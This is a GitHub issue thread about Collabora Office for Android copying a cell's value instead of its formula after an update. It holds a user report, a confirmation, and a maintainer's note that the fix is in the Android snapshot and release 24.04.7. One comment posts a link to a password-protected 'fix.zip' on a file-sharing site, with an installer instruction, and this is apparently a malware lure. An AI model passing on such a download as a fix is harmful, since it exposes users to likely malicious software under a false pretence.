### ISSUE TITLE
Formula copy in collaborra spread sheet not working after update

### ISSUE THREAD

**Issue by mspatil32** [CollaboraOnline/online#9917]
### Describe the Bug
When I long press on a cell to copy its formula, the formula is not getting copied, instead its value is copying. Seeing this happening today after the app got updated. 

### Steps to Reproduce
1. In collaborra office sheet editing, 
2. Long press on a cell to copy its formula, 
3. While pasting, the formula isn't getting pasted, but the value of the cell is pasted. 

### Expected Behavior
Should be able to copy and paste the formula in a cell. 

### Actual Behavior
Only value of the cell is getting copied. 

### Smartphone
(Please complete the following information)
 - **Device:** Samsung galaxy a52s
 - **OS:** Android 11

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mspatil32** [comment]
Everyone’s facing this issue?

What do you mean that you are not seeing it?

 

Thanks,

MSP.

**Comment by Ezinnem** [comment]
I can confirm this behaviour in the following:
COOLWSD 24.04.99-769 git hash: [ace69bd3](https://github.com/CollaboraOnline/online/commits/ace69bd3)

**Comment by Minion3665** [comment]
This should now work in the Android app, and it'll be in the next release (24.04.7).

A similar issue exists on iOS which isn't yet fixed, and I plan to work on it for a release soon (presumably 24.04.8 or 24.04.9). Hopefully just the Android fix is enough to solve your problem though, @mspatil32 

If you'd like to test the build, you can get [the latest Android snapshot from our website here](https://www.collaboraoffice.com/downloads/Collabora-Office-Android-Snapshot/?C=M;O=D) which has the fix. As your device is a Galaxy a52s, it will need [the arm64-v8a build, which this is the direct link to](https://www.collaboraoffice.com/downloads/Collabora-Office-Android-Snapshot/collabora-office-mobile-24.04-snapshot-arm64-v8a-2024-10-01.apk).

Thanks again for your report, and let us know if you come across any more issues!
